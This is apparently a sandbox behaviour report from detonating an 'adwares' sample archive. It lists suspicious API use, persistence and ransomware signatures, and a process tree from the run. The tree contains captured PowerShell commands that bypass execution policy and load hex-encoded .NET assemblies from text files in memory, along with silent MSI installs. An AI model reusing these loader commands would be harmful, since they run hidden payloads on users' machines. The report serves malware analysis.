N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\utils\sysinfo-app.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1564 wrote to memory of 4348 N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
PID 1564 wrote to memory of 4348 N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
PID 1564 wrote to memory of 4348 N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
PID 1928 wrote to memory of 2564 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 2564 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 2564 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2564 wrote to memory of 4372 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 4372 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 4372 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 2332 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 2332 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 2332 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 2084 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2564 wrote to memory of 2084 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2564 wrote to memory of 2084 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1928 wrote to memory of 5076 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 5076 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 5076 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5076 wrote to memory of 3752 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3752 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3752 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3936 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3936 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3936 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 1120 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 1120 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 1120 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\BBWC\7za.exe
PID 1120 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\BBWC\7za.exe
PID 1120 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\BBWC\7za.exe
PID 5076 wrote to memory of 2220 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2220 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2220 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2496 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2496 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2496 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 1756 N/A C:\Windows\system32\msiexec.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe
PID 1928 wrote to memory of 1756 N/A C:\Windows\system32\msiexec.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe
PID 1928 wrote to memory of 1756 N/A C:\Windows\system32\msiexec.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe
PID 5076 wrote to memory of 4748 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 4748 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 4748 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3856 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\OpenWith.exe
PID 5076 wrote to memory of 3856 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\OpenWith.exe
PID 5076 wrote to memory of 3856 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\OpenWith.exe
PID 2564 wrote to memory of 1712 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2564 wrote to memory of 1712 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2564 wrote to memory of 1712 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1928 wrote to memory of 4804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 4804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 4804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4804 wrote to memory of 4172 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4172 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4172 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2952 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2952 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2952 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2924 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2924 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2924 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 740 N/A C:\Windows\system32\OpenWith.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\adwares.rar

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\adwares\" -spe -an -ai#7zMap9050:72:7zEvent16807

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

"C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe"

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

"C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe" -service -lunch

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

"C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe"

C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe

"C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe"

C:\Users\Admin\Desktop\adwares\b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb.exe

"C:\Users\Admin\Desktop\adwares\b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb.exe"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\adwares\70ae0ba7881ccde62370f1168b00662af52a354b97f6cf8b01219f9046c0270f.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 387F523C118C54DD519CDB38C014E583 C

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8E04.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssAA2C.tmp.ps1"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Eclipse Media Inc\Installer Assistant\prerequisites\WCSetup_AppWC.msi" /q

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B17939AA30A6D3FE55DD66D5859A369D

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssBF84.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssD09F.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssDD65.tmp.ps1"

C:\Users\Admin\AppData\Roaming\BBWC\7za.exe

"C:\Users\Admin\AppData\Roaming/BBWC/7za.exe" x WC.7z -y -p1.21.1048.17470

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssEC0F.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssF838.tmp.ps1"

C:\Windows\Installer\MSI792.tmp

"C:\Windows\Installer\MSI792.tmp" /DontWait /HideWindow /dir "C:\Users\Admin\AppData\Roaming\BBWC\" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noninteractive -ExecutionPolicy bypass -c "$w="$env:APPDATA"+'/BBWC/';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Newtonsoft.Json.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'System.Data.SQLite.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'ICSharpCode.SharpZipLib.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'LZ4.dll'));$f=$w+'WC.txt';$h=Get-Content -Path $f -Raw;$h=Get-Content -Path $f -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.StartUp]::Start()"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7EC.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noninteractive -ExecutionPolicy bypass -c "$w="$env:APPDATA"+'/BBWC/';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Newtonsoft.Json.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'System.Data.SQLite.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'ICSharpCode.SharpZipLib.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'LZ4.dll'));$f=$w+'WC.txt';$h=Get-Content -Path $f -Raw;$h=Get-Content -Path $f -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.StartUp]::Start()"

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1C53.tmp.ps1"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Eclipse Media Inc\Installer Assistant\prerequisites\BESetup_AppWC.msi" /q

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 2FF098F60E0FC92857DBA518C23BC505

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss2E9A.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3C98.tmp.ps1"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss42B6.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4EC1.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ammyy.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff17e946f8,0x7fff17e94708,0x7fff17e94718

C:\Users\Admin\AppData\Roaming\Browser Extension\7za.exe

"C:\Users\Admin\AppData\Roaming/Browser Extension/7za.exe" x Data.7z -y -p1.20.154.17755

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2376 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2292 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss5E93.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6716 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6965.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4216 /prefetch:1

C:\Windows\Installer\MSI731B.tmp

"C:\Windows\Installer\MSI731B.tmp" /DontWait /HideWindow /dir "C:\Users\Admin\AppData\Roaming\Browser Extension\" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -c "$w="$env:APPDATA"+'/Browser Extension/BE.txt';$h=Get-Content -Path $w -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.BrowserExtension.S]::Start()"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

